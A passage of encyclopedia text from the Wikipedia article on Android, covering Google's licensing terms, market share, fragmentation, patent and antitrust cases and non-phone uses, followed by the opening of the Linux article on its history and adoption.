them, and must ship with an alternative software marketplace in lieu of Google Play Store.[117]A prominent example of such an Android fork isAmazon'sFire OS, which is used on theKindle Fireline of tablets, and oriented toward Amazon services.[117]The shipment of Android devices without GMS is also common in mainlandChina, as Google does not do business there.[345][346][347] In 2014, Google also began to require that all Android devices which license the Google Mobile Services software display a prominent "Powered by Android" logo on their boot screens.[118]Google has also enforced preferential bundling and placement of Google Mobile Services on devices, including mandated bundling of the entire main suite of Google applications, mandatory placement of shortcuts to Google Search and the Play Store app on or near the main home screen page in its default configuration,[348]and granting a larger share of search revenue to OEMs who agree to not include third-party app stores on their devices.[349]In March 2018, it was reported that Google had begun to block "uncertified" Android devices from using Google Mobile Services software, and display a warning indicating that "the device manufacturer has preloaded Google apps and services without certification from Google". Users of custom ROMs can register their device ID to their Google account to remove this block.[350] Some stock applications and components in AOSP code that were formerly used by earlier versions of Android, such as Search, Music, Calendar, and the location API, wereabandonedby Google in favor ofnon-freereplacements distributed through Play Store (Google Search, YouTube Music, and Google Calendar) andGoogle Play Services, which are no longer open-source. Moreover, open-source variants of some applications also exclude functions that are present in their non-free versions.[117][351][352][353]These measures are likely intended to discourage forks and encourage commercial licensing in line with Google requirements, as the majority of the operating system's core functionality is dependent on proprietary components licensed exclusively by Google, and it would take significant development resources to develop an alternative suite of software and APIs to replicate or replace them. Apps that do not use Google components would also be at a functional disadvantage, as they can only use APIs contained within the OS itself. In turn, third-party apps may have dependencies on Google Play Services.[354] Members of the Open Handset Alliance, which include the majority of Android OEMs, are also contractually forbidden from producing Android devices based on forks of the OS;[117][355]in 2012,Acer Inc.was forced by Google to halt production on a device powered byAlibaba Group'sAliyun OSwith threats of removal from the OHA, as Google deemed the platform to be an incompatible version of Android. Alibaba Group defended the allegations, arguing that the OS was a distinct platform from Android (primarily usingHTML5apps), but incorporated portions of Android's platform to allow backwards compatibility with third-party Android software. Indeed, the devices did ship with an application store which offered Android apps; however, the majority of them werepirated.[356][357][358] Android received a lukewarm reaction when it was unveiled in 2007. Although analysts were impressed with the respected technology companies that had partnered with Google to form the Open Handset Alliance, it was unclear whether mobile phone manufacturers would be willing to replace their existing operating systems with Android.[359]The idea of an open-source, Linux-baseddevelopment platformsparked interest,[360]but there were additional worries about Android facing strong competition from established players in the smartphone market, such as Nokia and Microsoft, and rival Linux mobile operating systems that were in development.[361]These established players were skeptical: Nokia was quoted as saying "we don't see this as a threat", and a member of Microsoft's Windows Mobile team stated "I don't understand the impact that they are going to have."[362] Since then Android has grown to become the most widely used smartphone operating system[363][364]and "one of the fastest mobile experiences available".[365]Reviewers have highlighted the open-source nature of the operating system as one of its defining strengths, allowing companies such as Nokia (Nokia X family),[366]Amazon (Kindle Fire),Barnes & Noble(Nook),Ouya,Baiduand others toforkthe software and release hardware running their own customised version of Android. As a result, it has been described by technology websiteArs Technicaas "practically the default operating system for launching new hardware" for companies without their own mobile platforms.[363]This openness and flexibility is also present at the level of the end user: Android allows extensive customisation of devices by their owners and apps are freely available from non-Google app stores and third party websites. These have been cited as among the main advantages of Android phones over others.[363][367] Despite Android's popularity, including an activation rate three times that of iOS, there have been reports that Google has not been able to leverage their other products and web services successfully to turn Android into the money maker that analysts had expected.[368]The Vergesuggested that Google is losing control of Android due to the extensive customization and proliferation of non-Google apps and services – Amazon's Kindle Fire line usesFire OS, a heavily modified fork of Android which does not include or support any of Google's proprietary components, and requires that users obtain software from its competingAmazon Appstoreinstead of Play Store.[117]In 2014, in an effort to improve prominence of the Android brand, Google began to require that devices featuring its proprietary components display an Android logo on the boot screen.[118] Android has suffered from "fragmentation",[369]a situation where the variety of Android devices, in terms of both hardware variations and differences in the software running on them, makes the task of developing applications that work consistently across the ecosystem harder than rival platforms such as iOS where hardware and software varies less. For example, according to data fromOpenSignalin July 2013, there were 11,868 models of Android devices, numerous screen sizes and eight Android OS versions simultaneously in use, while the large majority of iOS users have upgraded to the latest iteration of that OS.[370]Critics such asApple Insiderhave asserted that fragmentation via hardware and software pushed Android's growth through large volumes of low end, budget-priced devices running older versions of Android. They maintain this forces Android developers to write for the "lowest common denominator" to reach as many users as possible, who have too little incentive to make use of the latest hardware or software features only available on a smaller percentage of devices.[371]However, OpenSignal, who develops both Android and iOS apps, concluded that although fragmentation can make development trickier, Android's wider global reach also increases the potential reward.[370] Android is the most used operating system on phones in virtually all countries, with some countries, such as India, having over 96% market share.[372]On tablets, usage is more even, as iOS is a bit more popular globally. Research company Canalys estimated in the second quarter of 2009, that Android had a 2.8% share of worldwidesmartphoneshipments.[373]By May 2010, Android had a 10% worldwide smartphone market share, overtakingWindows Mobile,[374]whilst in the US Android held a 28% share, overtakingiPhone OS.[375]By the fourth quarter of 2010, its worldwide share had grown to 33% of the market becoming the top-selling smartphone platform,[376]overtakingSymbian.[377]In the US it became the top-selling platform in April 2011, overtakingBlackBerry OSwith a 31.2% smartphone share, according tocomScore.[378] By the third quarter of 2011,Gartnerestimated that more than half (52.5%) of the smartphone sales belonged to Android.[379]By the third quarter of 2012 Android had a 75% share of the global smartphone market according to the research firm IDC.[380] In July 2011, Google said that 550,000 Android devices were being activated every day,[381]up from 400,000 per day in May,[382]and more than 100 million devices had been activated[383]with 4.4% growth per week.[381]In September 2012, 500 million devices had been activated with 1.3 million activations per day.[384][385]In May 2013, at Google I/O, Sundar Pichai announced that 900 million Android devices had been activated.[386] Android market share varies by location. In July 2012, "mobile subscribers aged 13+" in the United States using Android were up to 52%,[387]and rose to 90% in China.[388]During the third quarter of 2012, Android's worldwide smartphone shipment market share was 75%,[380]with 750 million devices activated in total. In April 2013, Android had 1.5 million activations per day.[385]As of May 2013,[update]48 billion application ("app") installation have been performed from the Google Play store,[389]and by September 2013, one billion Android devices had been activated.[390] As of August 2020,[update]theGoogle Playstore had over 3 million Android applications published,[119][391]and as of May 2016,[update]apps had been downloaded more than 65 billion times.[392]The operating system's success has made it a target for patent litigation as part of the so-called "smartphone wars" between technology companies.[393][394] Android devices account for more than half of smartphone sales in most markets, including the US, while "only in Japan was Apple on top" (September–November 2013 numbers).[395]At the end of 2013, over 1.5 billion Android smartphones had been sold in the four years since 2010,[396][397]making Android the most sold phone and tablet OS. Three billion Android smartphones were estimated to be sold by the end of 2014 (including previous years). According to Gartner research company, Android-based devices outsold all contenders, every year since 2012.[398]In 2013, it outsold Windows 2.8:1 or by 573 million.[399][400][401]As of 2015,[update]Android has the largestinstalled baseof all operating systems;[22]Since 2013, devices running it also sell more than Windows, iOS and Mac OS X devices combined.[402] According toStatCounter, which tracks only the use for browsing the web, Android is the most popular mobile operating system since August 2013.[403]Android is the most popular operating system for web browsing in India and several other countries (e.g. virtually all of Asia, with Japan and North Korea exceptions). According to StatCounter, Android is most used on phones in all African countries, and it stated "mobile usage has already overtaken desktop in several countries including India, South Africa and Saudi Arabia",[404]with all countries in Africa having done so already in which mobile (including tablets) usage is at 90.46% (Android only, accounts for 75.81% of all use there).[405][406] While Android phones in theWestern worldalmost always include Google's proprietary code (such as Google Play) in the otherwise open-source operating system, Google's proprietary code and trademark is increasingly not used in emerging markets; "The growth ofAOSPAndroid devices goes way beyond just China [..] ABI Research claims that 65 million devices shipped globally with open-source Android in the second quarter of [2014], up from 54 million in the first quarter"; depending on country, percent of phones estimated to be based only on AOSP source code, forgoing the Android trademark: Thailand (44%), Philippines (38%), Indonesia (31%), India (21%), Malaysia (24%), Mexico (18%), Brazil (9%).[407] According to a January 2015Gartnerreport, "Android surpassed a billion shipments of devices in 2014, and will continue to grow at a double-digit pace in 2015, with a 26 percent increase year over year." This made it the first time that any general-purpose operating system has reached more than one billion end users within a year: by reaching close to 1.16 billion end users in 2014, Android shipped over four times more thaniOSandOS Xcombined, and over three times more thanMicrosoft Windows. Gartner expected the whole mobile phone market to "reach two billion units in 2016", including Android.[408]Describing the statistics, Farhad Manjoo wrote inThe New York Timesthat "About one of every two computers sold today is running Android. [It] has become Earth's dominant computing platform."[22] According to aStatistica's estimate, Android smartphones had an installed base of 1.8 billion units in 2015, which was 76% of the estimated total number of smartphones worldwide.[409][410][c]Android has the largest installed base of anymobile operating systemand, since 2013, the highest-selling operating system overall[399][402][412][413][414]with sales in 2012, 2013 and 2014[415]close to the installed base of all PCs.[416] In the second quarter of 2014, Android's share of the global smartphone shipment market was 84.7%, a new record.[417][418]This had grown to 87.5% worldwide market share by the third quarter of 2016,[419]leaving main competitoriOSwith 12.1% market share.[420] According to an April 2017StatCounterreport, Android overtook Microsoft Windows to become the most popular operating system for total Internet usage.[421][422]It has maintained the plurality since then.[423] In September 2015,Googleannounced that Android had 1.4 billion monthly active users.[424][425]This changed to 2 billion monthly active users in May 2017.[426][427] Despite its success on smartphones, initially Android tablet adoption was slow,[428]then later caught up with the iPad, in most countries. One of the main causes was thechicken or the eggsituation where consumers were hesitant to buy an Android tablet due to a lack of high quality tablet applications, but developers were hesitant to spend time and resources developing tablet applications until there was a significant market for them.[429][430]The content and app "ecosystem" proved more important than hardwarespecsas the selling point for tablets. Due to the lack of Android tablet-specific applications in 2011, early Android tablets had to make do with existing smartphone applications that were ill-suited to larger screen sizes, whereas the dominance of Apple'siPadwas reinforced by the large number of tablet-specificiOSapplications.[430][431] Despite app support in its infancy, a considerable number of Android tablets, like theBarnes & Noble Nook(alongside those using other operating systems, such as theHP TouchPadandBlackBerry PlayBook) were rushed out to market in an attempt to capitalize on the success of the iPad.[430]InfoWorldhas suggested that some Android manufacturers initially treated their first tablets as a "Frankenphone business", a short-term low-investment opportunity by placing a smartphone-optimized Android OS (before Android 3.0Honeycombfor tablets was available) on a device while neglecting user interface. This approach, such as with theDell Streak, failed to gain market traction with consumers as well as damaging the early reputation of Android tablets.[432][433]Furthermore, several Android tablets such as theMotorola Xoomwere priced the same or higher than theiPad, which hurt sales. An exception was theAmazonKindle Fire, which relied upon lower pricing as well as access to Amazon's ecosystem of applications and content.[430][434] This began to change in 2012, with the release of the affordableNexus 7and a push by Google for developers to write better tablet applications.[435]According to International Data Corporation, shipments of Android-powered tablets surpassed iPads in Q3 2012.[436] As of the end of 2013, over 191.6 million Android tablets had sold in three years since 2011.[437][438]This made Android tablets the most-sold type of tablet in 2013, surpassing iPads in the second quarter of 2013.[439] According to StatCounter's web use statistics, as of 2020[update], Android tablets represent the majority of tablet devices used inAfrica(70%),South America(65%), while less than half elsewhere, e.g. Europe (44%), Asia (44%), North America (34%) and Oceania/Australia (18%). There are countries on all continents where Android tablets are the majority, for example, Mexico.[440] Android has 71% market share vs Apple's iOS/iPadOS at 29% (on tablets alone Apple is slightly ahead, i.e. 48% vs 52%, though Android is ahead in virtually all countries). Android 14 is the most popular Android version on smartphones and on tablets. As of May 2025[update], Android 14 is most popular Android version on smartphones at 34%,[441](down from 37% peak, Android 15 at 12% has been eating away at it, about to get to be 3rd most popular version) followed by Android 13, and 12. Android is more used than iOS is virtually all countries, with few exceptions such as iOS has a 58% share in the US. Android 14 is the most-used single version on all countinents, and most countries, including India, the US and all European countries, with the exception of China (and there Android 15 is well ahead of it[442]). Usage of Android 12 and newer, i.e. supported versions, is at 73%, the rest of users are not supported with security updates, with recently unsupported Android 11, use is at 83%. On tablets, Android 14 is again the most popular version overall (also in e.g. India, Russia, Australia, Europe and South America), at 27%.[443][444]Usage of Android 12 and newer, i.e. supported versions, is at 48% on Android tablets, and with Android 11, until recently supported, at 64%. The usage share varies a lot by country. Since April 2024, 85.0% of devices haveVulkangraphics support (77.6% support Vulkan 1.1 or higher, thereof 6.6% supporting Vulkan 1.3),[449]the successor to OpenGL. At the same time 100.0% of the devices have support forOpenGL ES 2.0or higher, 95.9% are onOpenGL ES 3.0or higher, and 88.6% are using the latest versionOpenGL ES 3.2. Paid Android applications in the past were simple topirate.[450]In a May 2012 interview withEurogamer, the developers ofFootball Managerstated that the ratio of pirated players vs legitimate players was 9:1 for their gameFootball Manager Handheld.[451]However, not every developer agreed that piracy rates were an issue; for example, in July 2012 the developers of the gameWind-up Knightsaid that piracy levels of their game were only 12%, and most of the piracy came from China, where people cannot purchase apps from Google Play.[452] In 2010, Google released a tool for validating authorized purchases for use within apps, but developers complained that this was insufficient and trivial tocrack. Google responded that the tool, especially its initial release, was intended as a sample framework for developers to modify and build upon depending on their needs, not as a finished piracy solution.[453]Android "Jelly Bean" introduced the ability for paid applications to be encrypted, so that they may work only on the device for which they were purchased.[454][455] The success of Android has made it a target forpatentandcopyrightlitigation between technology companies, both Android and Android phone manufacturers having been involved in numerous patent lawsuits and other legal challenges. On August 12, 2010,Oraclesued Google over claimed infringement of copyrights and patents related to theJavaprogramming language.[456]Oracle originally sought damages up to $6.1 billion,[457]but this valuation was rejected by a United States federal judge who asked Oracle to revise the estimate.[458]In response, Google submitted multiple lines of defense, counterclaiming that Android did not infringe on Oracle's patents or copyright, that Oracle's patents were invalid, and several other defenses. They said that Android's Java runtime environment is based onApache Harmony, aclean roomimplementation of the Java class libraries, and an independently developed virtual machine calledDalvik.[459]In May 2012, the jury in this case found that Google did not infringe on Oracle's patents, and the trial judge ruled that the structure of the Java APIs used by Google was not copyrightable.[460][461]The parties agreed to zero dollars instatutory damagesfor a small amount of copied code.[462]On May 9, 2014, theFederal Circuitpartially reversed the district court ruling, ruling in Oracle's favor on the copyrightability issue, andremandingthe issue offair useto the district court.[463][464] In December 2015, Google announced that the next major release of Android (Android Nougat) would switch toOpenJDK, which is the official open-source implementation of the Java platform, instead of using the now-discontinued Apache Harmony project as its runtime. Code reflecting this change was also posted to the AOSP source repository.[225]In its announcement, Google claimed this was part of an effort to create a "common code base" between Java on Android and other platforms.[226]Google later admitted in a court filing that this was part of an effort to address the disputes with Oracle, as its use of OpenJDK code is governed under theGNU General Public License(GPL) with alinking exception, and that "any damages claim associated with the new versions expressly licensed by Oracle under OpenJDK would require a separate analysis of damages from earlier releases".[225]In June 2016, a United States federal court ruled in favor of Google, stating that its use of the APIs was fair use.[465] In April 2021, the Supreme Court of the United States ruled that Google's use of the Java APIs was within the bounds of fair use, reversing the Federal Circuit Appeals Court ruling and remanding the case for further hearing. The majority opinion began with the assumption that the APIs may be copyrightable, and thus proceeded with a review of the factors that contributed to fair use.[466] In 2013,FairSearch, a lobbying organization supported byMicrosoft,Oracleand others, filed a complaint regarding Android with theEuropean Commission, alleging that its free-of-charge distribution model constituted anti-competitivepredatory pricing. TheFree Software Foundation Europe, whose donors include Google, disputed the Fairsearch allegations.[467]On April 20, 2016, the EU filed a formalantitrust complaintagainst Google based upon the FairSearch allegations, arguing that its leverage over Android vendors, including the mandatory bundling of the entire suite of proprietary Google software, hindering the ability for competing search providers to be integrated into Android, and barring vendors from producing devices running forks of Android, constituted anti-competitive practices.[468]In August 2016, Google was fined US$6.75 million by the RussianFederal Antimonopoly Service(FAS) under similar allegations byYandex.[469]The European Commission issued its decision on July 18, 2018, determining that Google had conducted three operations related to Android that were in violation of antitrust regulations: bundling Google's search and Chrome as part of Android, blocking phone manufacturers from using forked versions of Android, and establishing deals with phone manufacturers and network providers to exclusively bundle the Google search application on handsets (a practice Google ended by 2014). The EU fined Google for€4.3 billion(aboutUS$5 billion) and required the company to end this conduct within 90 days.[470]Google filed its appeal of the ruling in October 2018, though will not ask for any interim measures to delay the onset of conduct requirements.[471] On October 16, 2018, Google announced that it would change its distribution model for Google Mobile Services in the EU, since part of its revenues streams for Android which came through use of Google Search and Chrome were now prohibited by the EU's ruling. While the core Android system remains free, OEMs in Europe would be required to purchase a paid license to the core suite of Google applications, such as Gmail, Google Maps and the Google Play Store. Google Search will be licensed separately, with an option to include Google Chrome at no additional cost atop Search. European OEMs can bundle third-party alternatives on phones and devices sold to customers, if they so choose. OEMs will no longer be barred from selling any device running incompatible versions of Android in Europe.[472] In addition to lawsuits against Google directly, variousproxy warshave been waged against Android indirectly by targeting manufacturers of Android devices, with the effect of discouraging manufacturers from adopting the platform by increasing the costs of bringing an Android device to market.[473]BothAppleand Microsoft have sued several manufacturers for patent infringement, with Apple'slegal action against Samsungbeing a particularly high-profile case. In January 2012, Microsoft said they had signed patent license agreements with eleven Android device manufacturers, whose products account for "70 percent of all Android smartphones" sold in the US[474]and 55% of the worldwide revenue for Android devices.[475]These includeSamsungandHTC.[476]Samsung's patent settlement with Microsoft included an agreement to allocate more resources to developing and marketing phones running Microsoft's Windows Phone operating system.[473]Microsoft has alsotiedits own Android software to patent licenses, requiring the bundling ofMicrosoft Office MobileandSkypeapplications on Android devices to subsidize the licensing fees, while at the same time helping to promote its software lines.[477][478] Google has publicly expressed its frustration for the current patent landscape in the United States, accusing Apple, Oracle and Microsoft of trying to take down Android through patent litigation, rather than innovating and competing with better products and services.[479]In August 2011, Google purchasedMotorola Mobilityfor US$12.5 billion, which was viewed in part as a defensive measure to protect Android, since Motorola Mobility held more than 17,000 patents.[480][481]In December 2011, Google bought over a thousand patents fromIBM.[482] Turkey's competition authority investigations about the default search engine in Android, started in 2017, led to a US$17.4 million fine in September 2018 and a fine of 0.05 percent of Google's revenue per day in November 2019 when Google did not meet the requirements.[483]In December 2019, Google stopped issuing licenses for new Android phone models sold in Turkey.[483] Google has developed several variations of Android for specific use cases, including Android Wear, later renamedWear OS, for wearable devices such as wrist watches,[484][485]Android TVfor televisions,[486][487]Android Thingsfor smart orInternet of thingsdevices andAndroid Automotivefor cars.[488][489]Additionally, by providing infrastructure that combines dedicated hardware and dedicated applications running on regular Android, Google have opened up the platform for its use in particular usage scenarios, such as theAndroid Autoapp for cars,[490][491]andDaydream, a Virtual Reality platform.[492] The open and customizable nature of Android allowsdevice makersto use it on other electronics as well, including laptops,netbooks,[493][494]and desktop computers,[495]cameras,[496]headphones,[497]home automationsystems, game consoles,[498]media players,[499]satellites,[500]routers,[501]printers,[502]payment terminals,[503]automated teller machines,[504]inflight entertainment systems,[505]androbots.[506]Additionally, Android has been installed and run on a variety of less-technical objects, including calculators,[507]single-board computers,[508]feature phones,[509]electronic dictionaries,[510]alarm clocks,[511]refrigerators,[512]landlinetelephones,[513]coffee machines,[514]bicycles,[515]and mirrors.[498] Ouya, a video game console running Android, became one of the most successfulKickstartercampaigns,crowdfundingUS$8.5m for its development,[516][517]and was later followed by other Android-based consoles, such asNvidia'sShield Portable– an Android device in avideo game controllerform factor.[518] In 2011, Google demonstrated "Android@Home", a home automation technology which uses Android to control a range of household devices including light switches, power sockets and thermostats.[519]Prototype light bulbs were announced that could be controlled from an Android phone or tablet, but Android head Andy Rubin was cautious to note that "turning a lightbulb on and off is nothing new", pointing to numerous failed home automation services. Google, he said, was thinking more ambitiously and the intention was to use their position as acloudservices provider to bring Google products into customers' homes.[520][521] Parrotunveiled an Android-basedcar stereosystem known as Asteroid in 2011,[522]followed by a successor, the touchscreen-based Asteroid Smart, in 2012.[523]In 2013,Clarionreleased its own Android-based car stereo, the AX1.[524]In January 2014, at theConsumer Electronics Show(CES), Google announced the formation of theOpen Automotive Alliance, a group including several major automobile makers (Audi,General Motors,Hyundai, andHonda) andNvidia, which aims to produce Android-basedin-car entertainmentsystems for automobiles, "[bringing] the best of Android into the automobile in a safe and seamless way."[525] Android comes preinstalled on a few laptops (a similar functionality of running Android applications is also available in Google'sChromeOS) and can also be installed onpersonal computersby end users.[526][527]On those platforms Android provides additional functionality for physicalkeyboards[528]andmice, together with the "Alt-Tab" key combination for switching applications quickly with a keyboard. In December 2014, one reviewer commented that Android's notification system is "vastly more complete and robust than in most environments" and that Android is "absolutely usable" as one's primary desktop operating system.[529] In October 2015,The Wall Street Journalreported that Android will serve as Google's future main laptop operating system, with the plan to fold ChromeOS into it by 2017.[530][531]Google's Sundar Pichai, who led the development of Android, explained that "mobile as a computing paradigm is eventually going to blend with what we think of as desktop today."[530]Also, back in 2009, Google co-founder Sergey Brin himself said that ChromeOS and Android would "likely converge over time."[532]Lockheimer, who replaced Pichai as head of Android and ChromeOS, responded to this claim with an official Google blog post stating that "While we've been working on ways to bring together the best of both operating systems, there's no plan to phase out ChromeOS [which has] guaranteed auto-updates for five years".[533]That is unlike Android where support is shorter with "EOLdates [being..] at least 3 years [into the future] for Android tablets for education".[534] At Google I/O in May 2016, Google announcedDaydream, avirtual realityplatform that relied on a smartphone and provided VR capabilities through avirtual reality headsetand controller designed by Google itself.[492]However, this did not catch on and was discontinued in 2019.[535] The mascot of Android is a greenandroid robot, as related to the software's name. Although it had no official name for a long time, the Android team at Google reportedly call it "Bugdroid".[536]In 2024, a Google blog post revealed its official name, "The Bot".[537][538] It was designed by then-Google graphic designerIrina Blokon November 5, 2007, when Android was announced. Contrary to reports that she was tasked with a project to create an icon,[539]Blok confirmed in an interview that she independently developed it and made itopen source. The robot design was initially not presented to Google, but it quickly became commonplace in the Android development team, with various variations of it created by the developers there who liked the figure, as it was free under aCreative Commonslicense.[540][541]Its popularity amongst the development team eventually led to Google adopting it as an official icon as part of the Android logo when it launched to consumers in 2008.
https://en.wikipedia.org/wiki/Android_(operating_system)
Linux(/ˈlɪnʊks/,LIN-uuks)[15]is a family ofopen sourceUnix-likeoperating systemsbased on theLinux kernel,[16]anoperating system kernelfirst released on September 17, 1991, byLinus Torvalds.[17][18][19]Linux is typicallypackagedas aLinux distribution(distro), which includes the kernel and supportingsystem softwareandlibraries—most of which are provided by third parties—to create a complete operating system, designed as a clone ofUnixand released under thecopyleftGPLlicense.[20] Thousands of Linux distributionsexist, many based directly or indirectly on other distributions;[21][22]popular Linux distributions[23][24][25]includeDebian,Fedora Linux,Linux Mint,Arch Linux, andUbuntu, while commercial distributions includeRed Hat Enterprise Linux,SUSE Linux Enterprise, andChromeOS. Linux distributions are frequently used in server platforms.[26][27]Many Linux distributions use the word "Linux" in their name, but theFree Software Foundationuses and recommends the name "GNU/Linux" to emphasize the use and importance ofGNUsoftware in many distributions, causing somecontroversy.[28][29]Other than the Linux kernel, key components that make up a distribution may include adisplay server (windowing system), apackage manager, a bootloader and aUnix shell. Linux is one of the most prominent examples of free and open-sourcesoftwarecollaboration. While originally developed forx86basedpersonal computers, it has since beenportedto moreplatformsthan any other operating system,[30]and is used on a wide variety of devices including PCs,workstations,mainframesandembedded systems. Linux is the predominant operating system forserversand is also used on all of theworld's 500 fastest supercomputers.[g]When combined withAndroid, which is Linux-based and designed forsmartphones, they have thelargest installed baseof allgeneral-purpose operating systems. The Linux kernel was designed byLinus Torvalds, following the lack of a workingkernelforGNU, aUnix-compatible operating system made entirely offree softwarethat had been undergoing development since 1983 byRichard Stallman. A working Unix system calledMinixwas later released but its license was not entirely free at the time[31]and it was made for an educative purpose. The first entirely free Unix for personal computers,386BSD, did not appear until 1992, by which time Torvalds had already built and publicly released the first version of theLinux kernelon theInternet.[32]Like GNU and 386BSD, Linux did not have any Unix code, being a fresh reimplementation, and therefore avoided thethen legal issues.[33]Linux distributions became popular in the 1990s and effectively made Unix technologies accessible to home users on personal computers whereas previously it had been confined to sophisticatedworkstations.[34] Desktop Linux distributions include awindowing systemsuch asX11orWaylandand adesktop environmentsuch asGNOME,KDE PlasmaorXfce. Distributions intended forserversmay not have agraphical user interfaceat all or include asolution stacksuch asLAMP. Thesource codeof Linux may be used, modified, and distributed commercially or non-commercially by anyone under the terms of its respective licenses, such as theGNU General Public License(GPL). The license means creating novel distributions is permitted by anyone[35]and is easier than it would be for an operating system such asMacOSorMicrosoft Windows.[36][37][38]The Linux kernel, for example, is licensed under the GPLv2, with an exception forsystem callsthat allows code that calls the kernel via system calls not to be licensed under the GPL.[39][40][35] Because of the dominance of Linux-basedAndroidonsmartphones, Linux, including Android, has thelargest installed baseof allgeneral-purpose operating systemsas of May 2022[update].[41][42][43]Linux is, as of March 2024[update], used by around 4 percent ofdesktop computers.[44]TheChromebook, which runs the Linux kernel-basedChromeOS,[45][46]dominates the USK–12education market and represents nearly 20 percent of sub-$300notebooksales in the US.[47]Linux is the leading operating system on servers (over 96.4% of the top one million web servers' operating systems are Linux),[48]leads otherbig ironsystems such asmainframe computers,[clarification needed][49]and is used on all of theworld's 500 fastest supercomputers[h](as of November 2017[update], having gradually displaced all competitors).[50][51] Linux also runs onembedded systems, i.e., devices whose operating system is typically built into thefirmwareand is highly tailored to the system. This includesrouters,automationcontrols,smart home devices,video game consoles,televisions(Samsung and LGsmart TVs),[52][53][54]automobiles(Tesla, Audi, Mercedes-Benz, Hyundai, and Toyota),[55]andspacecraft(Falcon 9rocket,Dragoncrew capsule, and theIngenuityMars helicopter).[56][57] TheUnixoperating system was conceived of and implemented in 1969, atAT&T'sBell Labsin the United States, byKen Thompson,Dennis Ritchie,Douglas McIlroy, andJoe Ossanna.[58]First released in 1971, Unix was written entirely inassembly language, as was common practice at the time. In 1973, in a key pioneering approach, it was rewritten in theCprogramming language by Dennis Ritchie (except for some hardware and I/O routines). The availability of ahigh-level languageimplementation of Unix made itsportingto different computer platforms easier.[59] As a 1956antitrust caseforbade AT&T from entering the computer business,[60]AT&T provided the operating system'ssource codeto anyone who asked. As a result, Unix use grew quickly and it became widely adopted byacademic institutionsand businesses. In 1984,AT&T divested itselfof itsregional operating companies, and was released from its obligation not to enter the computer business; freed of that obligation, Bell Labs began selling Unix as aproprietaryproduct, where users were not legally allowed to modify it.[61][62] Onyx Systemsbegan selling early microcomputer-based Unix workstations in 1980. Later,Sun Microsystems, founded as a spin-off of a student project atStanford University, also began selling Unix-based desktop workstations in 1982. While Sun workstations did not use commodity PC hardware, for which Linux was later originally developed, it represented the first successful commercial attempt at distributing a primarily single-user microcomputer that ran a Unix operating system.[63][64] With Unix increasingly "locked in" as a proprietary product, theGNU Project, started in 1983 byRichard Stallman, had the goal of creating a "complete Unix-compatible software system" composed entirely offree software. Work began in 1984.[65]Later, in 1985, Stallman started theFree Software Foundationand wrote theGNU General Public License(GNU GPL) in 1989. By the early 1990s, many of the programs required in an operating system (such as libraries,compilers,text editors, acommand-line shell, and awindowing system) were completed, although low-level elements such asdevice drivers,daemons, and thekernel, calledGNU Hurd, were stalled and incomplete.[66] Minixwas created byAndrew S. Tanenbaum, acomputer scienceprofessor, and released in 1987 as a minimal Unix-like operating system targeted at students and others who wanted to learn operating system principles. Although thecomplete source code of Minix was freely available, the licensing terms prevented it from beingfree softwareuntil the licensing changed in April 2000.[67] While attending theUniversity of Helsinkiin the fall of 1990, Torvalds enrolled in a Unix course.[68]The course used aMicroVAXminicomputer runningUltrix, and one of the required texts wasOperating Systems: Design and ImplementationbyAndrew S. Tanenbaum. This textbook included a copy of Tanenbaum'sMinixoperating system. It was with this course that Torvalds first became exposed to Unix. In 1991, he became curious about operating systems.[69]Frustrated by the licensing of Minix, which at the time limited it to educational use only,[67]he began to work on his operating system kernel, which eventually became the Linux kernel. On July 3, 1991, to implement Unixsystem calls, Linus Torvalds attempted unsuccessfully to obtain a digital copy of thePOSIXstandardsdocumentationwith a request to thecomp.os.minixnewsgroup.[70]After not finding the POSIX documentation, Torvalds initially resorted to determining system calls fromSunOSdocumentation owned by the university for use in operating itsSun Microsystemsserver. He also learned some system calls from Tanenbaum's Minix text. Torvalds began the development of the Linux kernel on Minix and applications written for Minix were also used on Linux. Later, Linux matured and further Linux kernel development took place on Linux systems.[71]GNU applications also replaced all Minix components, because it was advantageous to use the freely available code from the GNU Project with the fledgling operating system; code licensed under the GNU GPL can be reused in other computer programs as long as they also are released under the same or a compatible license. Torvalds initiated a switch from his original license, which prohibited commercial redistribution, to the GNU GPL.[72]Developers worked to integrate GNU components with the Linux kernel, creating a fully functional and free operating system.[73] Although not released until 1992, due tolegal complications, the development of386BSD, from whichNetBSD,OpenBSDandFreeBSDdescended, predated that of Linux. Linus Torvalds has stated that if theGNU kernelor 386BSD had been available in 1991, he probably would not have created Linux.[74][31] Linus Torvalds had wanted to call his invention "Freax", aportmanteauof "free", "freak", and "x" (as an allusion to Unix). During the start of his work on the system, some of the project'smakefilesincluded the name "Freax" for about half a year. Torvalds considered the name "Linux" but dismissed it as too egotistical.[75] To facilitate development, the files were uploaded to theFTP serverofFUNETin September 1991. Ari Lemmke, Torvalds' coworker at theHelsinki University of Technology(HUT) who was one of the volunteer administrators for the FTP server at the time, did not think that "Freax" was a good name, so he named the project "Linux" on the server without consulting Torvalds.[75]Later, however, Torvalds consented to "Linux". According to anewsgrouppost by Torvalds,[15]the word "Linux" should be pronounced (/ˈlɪnʊks/ⓘLIN-uuks) with a short 'i' as in 'print' and 'u' as in 'put'. To further demonstrate how the word "Linux" should be pronounced, he included an audio guide with the kernel source code.[76]However, in this recording, he pronounces Linux as/ˈlinʊks/(LEEN-uuks) with a short butclose front unrounded vowel, instead of anear-close near-front unrounded vowelas in his newsgroup post. The adoption of Linux in production environments, rather than being used only by hobbyists, started to take off first in the mid-1990s in the supercomputing community, where organizations such asNASAstarted to replace their increasingly expensive machines withclustersof inexpensive commodity computers running Linux. Commercial use began whenDellandIBM, followed byHewlett-Packard, started offering Linux support to escapeMicrosoft's monopoly in the desktop operating system market.[77] Today, Linux systems are used throughout computing, fromembedded systemsto virtually allsupercomputers,[51][78]and have secured a place in server installations such as the popularLAMPapplication stack. The use of Linux distributions in home and enterprise desktops has been growing.[79][80][81][82][83][84][85] Linux distributions have also become popular in thenetbookmarket, with many devices shipping with customized Linux distributions installed, and Google releasing their ownChromeOSdesigned for netbooks. Linux's greatest success in the consumer market is perhaps the mobile device market, with Android being the dominant operating system onsmartphonesand very popular ontabletsand, more recently, onwearables, and vehicles.Linux gamingis also on the rise withValveshowing its support for Linux and rolling outSteamOS, its own gaming-oriented Linux distribution, which was later implemented in theirSteam Deckplatform. Linux distributions have also gained popularity with various local and national governments, such as the federal government ofBrazil.[86] Linus Torvalds is the lead maintainer for the Linux kernel and guides its development, whileGreg Kroah-Hartmanis the lead maintainer for the stable branch.[87]Zoë Kooymanis the executive director of the Free Software Foundation,[88]which in turn supports the GNU components.[89]Finally, individuals and corporations develop third-party non-GNU components. These third-party components comprise a vast body of work and may include both 